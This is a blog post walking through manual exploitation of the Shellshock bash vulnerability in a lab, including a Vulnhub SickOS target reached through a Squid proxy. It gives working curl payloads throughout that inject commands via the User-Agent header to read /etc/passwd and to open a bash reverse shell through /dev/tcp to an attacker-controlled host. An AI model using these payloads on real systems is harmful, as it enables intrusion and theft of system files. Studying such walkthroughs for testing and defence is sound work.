Exploiting Shellshock Manually

by Vince
in Blog
Hits: 36999

The scanner comes back with:  "Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)."

I realize I'm talking about a four year old vulnerability but it's one that still exists and it's a rabbit hole I wanted to jump into.  I've come across this vulnerability a few times in the past and I've either used Metasploit or 34900.py ("Apache mod_cgi - 'Shellshock' Remote Command Injection") to get my shell.  I seem to recall having an issue with one or both at some point and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.

Stumbling upon this vulnerability recently, I paused to dig into it with the intention of getting a better understanding for manual exploitation.

The classic examples I see in from searches are the remote test:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.90.59/cgi-bin/test.sh




And the local test:

x='() { :;}; echo VULNERABLE' bash -c : 



If I'm local, I don't really care, I already have a shell.  It's that remote angle I want to leverage.  With a slight change of our syntax, we can read /etc/passwd:

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://192.168.90.59/cgi-bin/test.sh



Nice!

Now let's test for outbound connectivity on port 9999:

curl -H 'User-Agent: () { :; }; /bin/bash -c 'ping -c 3 192.168.90.35:9999'' http://192.168.90.59/cgi-bin/test.sh




On our side, we setup the listener:




Cool.  We know we can connect outbound on port 9999, let's go for the reverse shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.90.35/9999 0>&1' http://192.168.90.59/cgi-bin/test.sh




Setting up the listener:




Excellent -- we have a shell! 

It wasn't really that hard to get this working, I just needed to play with the syntax.  In my searching, I saw examples of using wget or curl to pull in other files but I never understood why the need to add extra steps when you can get the shell directly.  

So maybe you're thinking what's the big deal?  Why did I need to go through this exercise?  

Sometimes I rely on tools and it's a crutch.  Sometimes I understand the mechanics and the tool is just easier / quicker.  In this case, it was most definitely a crutch for a lack of knowledge and here's where this would have helped me out. 

A while ago, I wrote up Vulnhub SickOS 1.1 Walkthrough and I actually noted the server was vulnerable to Shellshock.  In the writeup, I walk through the process of exploiting the CMS which gets me a low privilege shell but now let me take you through the express lane.

We know we have a Squid proxy running on our target.  Let's use Curl to hit the CGI script through the proxy:

curl -x http://192.168.90.61:3128 -L http://127.0.0.1/cgi-bin/status 



Cool, it works.  Now let's check to see if it's vulnerable to Shellshock (we already know it is -- humor me!):

curl -x http://192.168.90.61:3128 -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" -L http://127.0.0.1/cgi-bin/status




Excellent!  Now let's get that shell:

curl -x http://192.168.90.61:3128 -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.90.35/9999 0>&1' -L http://127.0.0.1/cgi-bin/status




Setting up the listener:



Shellz for everyone!